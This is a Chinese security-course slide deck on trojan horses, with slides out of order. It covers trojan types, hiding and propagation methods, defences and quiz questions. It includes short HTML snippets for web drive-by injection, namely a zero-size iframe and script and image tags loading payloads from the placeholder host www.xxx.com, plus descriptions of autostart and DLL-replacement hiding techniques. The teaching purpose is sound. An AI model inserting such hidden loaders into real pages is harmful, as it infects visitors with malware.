第12章 特洛伊木马..

3、有记录在线离线刻录特征的木马属于哪种特洛伊木马 _______ A.代理木马 B.键盘记录木马 C.远程访问型 D.程序杀手木马 4、特洛伊木马与远程控制软件的区别在于木马使用了什么技术 _______ A.远程登录技术 B.远程控制技术 C.隐藏技术 D.监视技术
5、哪种木马隐藏技术的特点是没有增加新文件、不打开新的端 口，没有生成新的进程的情况下进行危害_______ A.修改动态链接库加载 B.捆绑文件 C.修改文件关联 D.利用注册表加载 6、每种网络威胁都有其目的性，那么网络钓鱼发布者想要实现 什么目的_______ A.破坏计算机系统 B.单纯的对某网页进行挂马 C.体现黑客的技术 D.窃取个人隐私信息
15
DoS攻击木马
• 入侵一台机器 • 将该计算机做为DoS攻击的平台，也称为肉鸡 • 攻击者可以利用它来攻击一台又一台计算机，给网络造成很大 的伤害和带来损失 • 邮件炸弹木马 一旦机器被感染，木马就会随机生成各种各样主题的信件，对 特定的邮箱不停地发送邮件，一直到对方瘫痪、不能接受邮件 为止
16
– 将网页木马利用frame语句加载到任意网页中
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
解释：在打开插入该句代码的网页后，就也就打开了 http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以很 难察觉，非常具有隐蔽性。
– 优势： 没有增加新的文件 不需要打开新的端口 没有新的进程产生
24
特洛伊木马的传播
常见传播方式（一）
• 捆绑欺骗
– 把木马服务端和某个游戏/软件捆绑成一个文件 – 通过即时通讯工具、邮件、下载工具等渠道发送出去
• 钓鱼欺骗（Phishing）
– 构造一个链接或者一个网页 – 利用社会工程学欺骗方法 – 欺骗用户输入某些个人，隐私信息，然后窃取个人隐私
2、网络传播型木马的特征有很多，请问哪个描述是正确的 _______ A.利用现实生活中的邮件进行散播, 不会破坏数据，但是他将硬 盘加密锁死 B.兼备伪装和传播两种特征并结合TCP/IP网络技术四处泛滥，同 时他还添加了“后门”和击键记录等功能 C.通过伪装成一个合法性程序诱骗用户上当 D.通过消耗内存而引起注意
8
特洛伊木马的演变
• 第三代木马：网络传播型木马
– 随着Internet的普及，这一代木马兼备伪装和传播两种特征 并结合TCP/IP网络技术四处泛滥。同时他还添加了“后门” 和击键记录等功能。 – 所谓后门就是一种可以为计算机系统秘密开启访问入口的程 序。 – 击键记录的功能功能主要是记录用户所有的击键内容然后形 成击键记录的日志文件发送给恶意用户。
第十二章特洛伊木马
本章概要
本章内容主要是特洛伊木马的知识，包括： 木马的概念 木马的危害
木马的隐藏和传播技术
典型木马分析与防范措施
2
本章目标
通过本章学习，了解特洛伊木马病毒的概念、攻 击隐藏技术、防范措施等，了解如何解决处理计算机 木马病毒。
3
特洛伊木马简史
特洛伊木马传说
古希腊传说，特洛伊王子帕里斯 访问希腊，诱惑走了王后海伦， 希腊人因此远征特洛伊。围攻9年 后，到第 10 年，希腊将领奥德修 斯献了一计，就是把一批勇士埋 伏在一匹巨大的木马腹内，放在 城外后，佯作退兵。特洛伊人以 为敌兵已退，就把木马作为战利 品搬入城中。到了夜间，埋伏在 木马中的勇士跳出来，打开了城 门，希腊将士一拥而入攻下了城 池。
• 漏洞攻击
– 利用操作系统和应用软件的漏洞进行的攻
26
常见传播方式（二）
• 网页挂马
– 网页挂马就是攻击者通过在正常的页面中（通常是网站的主页 ）插入一段代码。浏览者在打开该页面的时候，这段代码被执 行，然后下载并运行某木马的服务器端程序，进而控制浏览者 的主机
27
网页挂马技术（一）
• 框架嵌入式网络挂马
5
特洛伊木马病毒概念
特洛伊木马(Trojan)病毒： 是指隐藏在正常程序中的一段具有特殊功能的恶意代码 是具备破坏和删除文件、发送密码、记录键盘和攻击Dos 等特殊功能的后门程序
特洛伊木马程序往往表面上看起来 无害，但是会执行一些未预料或未 经授权，通常是恶意的操作。
6
木马的组成
• 一个完整的木马程序由两部分组成
代理木马
• 黑客在入侵的同时掩盖自己的足迹 • 给被控制的肉鸡种上代理木马 • 攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序
17
FTP木马
• 功能就是打开21端口，等待用户连接 • 对端口进行加密，只有攻击者本人才知道正确的密码， 从而进入对方计算机
18
程序杀手木马
• 关闭对方机器上运行的防木马程序 • 让其他的木马更好地发挥作用。
服务器端
• 中木马的计算机,即被控制端
控制器端
• 通过网络控制您的计算机
7
特洛伊木马的演变
• 第一代木马 ：伪装型病毒
– 通过伪装成一个合法性程序诱骗用户上当
• 第二代木马 ：AIDS型木马
– 利用现实生活中的邮件进行散播：给其他人寄去一封封含有木马 程序软盘的邮件。之所以叫这个名称是因为软盘中包含有AIDS 和HIV疾病的药品，价格，预防措施等相关信息。软盘中的木马 程序在运行后，虽然不会破坏数据，但是他将硬盘加密锁死，然 后提示受感染用户花钱消灾
7、什么是网页挂马_______ A.攻击者通过在正常的页面中（通常是网站的主页）插入一段代 码。浏览者在打开该页面的时候，这段代码被执行，然后下载 并运行某木马的服务器端程序，进而控制浏览者的主机 B.黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一 个网页，利用社会工程学欺骗方法，引诱点击，当用户打开一 个看似正常的页面时，网页代码随之运行，隐蔽性极高 C.把木马服务端和某个游戏/软件捆绑成一个文件通过QQ/MSN 或邮件发给别人，或者通过制作BT木马种子进行快速扩散 D.与从互联网上下载的免费游戏软件进行捆绑。被激活后，它就 会将自己复制到Windows的系统文件夹中，并向注册表添加键 值，保证它在启动时被执行。
防范措施
1）使用正版防毒软件，并及时更新防毒病毒码； 2）及时打上系统和软件补丁； 3）不要访问色情、黑客等不良网站； 4）不要轻易相信“朋友”发来的链接和程序，对于下载的软件应该先查毒，然后 才能运行； 5）陌生人的邮件勿轻易打开； 6）定期更新密码，尤其是银行账号、游戏账号等的密码； 7) 使用防毒软件定期扫描系统。 对于企业用户而言还应做好以下几点： 1）加强网络管理，关闭不必要的网络端口和应用； 2）使用网络版的防毒软件，可以进行全网管理； 3）加强用户安全意识教育； 4）做好安全监控和病毒事件应急响应； 5）监控Web服务器是否挂马，有条件者可以寻求专业防毒机构和专业人士的支持 。
• 隐藏加载方式
– – – – – – – – – 在Win.ini中启动 在System.ini中启动 利用注册表加载运行 在Autoexec.bat和Config.sys中加载运行 在Winstart.bat中启动 启动组 *.INI 修改文件关联 捆绑文件
23
隐藏技术（三）
• 最新隐身技术
– 修改虚拟设备驱动程序(VXD) – 修改动态链接库 (DLL) – 将修改后的DLL替换系统已知的DLL，并对所有的函数调 用进行过滤
Leabharlann Baidu
28
网页挂马技术（二）
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript src=http://www.xxx.com/gm.js></script> http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木马 的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关的 选项就可以了
19
反弹端口型木马
• 服务端 (被控制端)使用主动端口 • 客户端 (控制端)使用被动端口 • 木马定时监测控制端的存在，发现控制端上线立即弹出端口主 动连结控制端打开的主动端口;为了隐蔽起见，控制端的被动 端口一般开在 80，即使用户使用扫描软件检查自己的端口， 发现类似TCP UserIP:1026 ControllerIP:80ESTABLISHED的 情况，稍微疏忽一点，你就会以为是自己在浏览网页。
33
1、以下对特洛伊木马的概念描述正确的是_______ A,.特洛伊木马不是真正的网络威胁，只是一种游戏 B.特洛伊木马是指隐藏在正常程序中的一段具有特殊功能的恶意 代码，是具备破坏和删除文件、发送密码、记录键盘和攻击 Dos等特殊功能的后门程序。 C.特洛伊木马程序的特征很容易从计算机感染后的症状上进行判 断 D.中了特洛伊木马就是指安装了木马的客户端程序，若你的电脑 被安装了客户端程序，则拥有相应服务器端的人就可以通过网 络控制你的电脑。
29
网页挂马技术（三）
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中
图片木马生成后，再利用代码调用执行，实例代码如：
<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html>
20
特洛伊木马隐藏技术
隐藏技术（一）
• 在任务管理器里隐藏
– 任务管理器中查看不到木马进程 – 木马将自己设成“系统服务”
• 在任务栏里隐藏
– 通过VB编程中属性设置实现自身不出现在任务栏中
• 端口修改
– 使用非常用端口，或高位端口 – 自己修改端口
22
隐藏技术（二）
• 隐藏通讯
– 占领 80HTTP端口 – 收到正常的HTTP请求仍然把它交与Web服务器处理，只有收到 一些特殊约定的数据包后，才调用木马程序
9
特洛伊木马简史
特洛伊木马的类型
• • • • • • • • • 破坏型 密码发送型 远程访问型 键盘记录木马 DoS攻击木马 代理木马 FTP木马 程序杀手木马 反弹端口型木马
11
破坏型木马
• 破坏并且删除文件 • 删除DLL、INI、EXE文件
12
密码发送型
• 查找相关密码 • 发送指定邮件（控制者） 获取密码的方法：
8、目前网络面临的最严重安全威胁是什么_______ A.捆绑欺骗 B.钓鱼欺骗 C.漏洞攻击 D.网页挂马 9、一个完整的木马程序有两部分组成,请问是哪两部分_______ A.服务器端 B.控制器端 C. 接收木马端 D.发送木马端
谢谢！
40
– 搜索密码文件 – 记录键盘操作 – 暴力破译加密文件
13
远程访问型
• 只需有人运行了服务端程序，如果客户知道了服务端的IP地址 ，就可以实现远程控制。 • 利用程序可以实现观察“受害者”正在干什么 • 可用于计算机远程监控和远程排错等操作
14
键盘记录木马
• 记录受害者的键盘敲击并且在LOG文件里查找密码 • 随着Windows启动 • 同时具有邮件发送功能
注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是 http://www.xxx.com/test.jpg，而http://www.xxx.com/test.htm网页代码也随 之运行。
30
TROJ_WIDGET.046
1. 用户从互联网 下载免费软件
31
特洛伊木马防范措施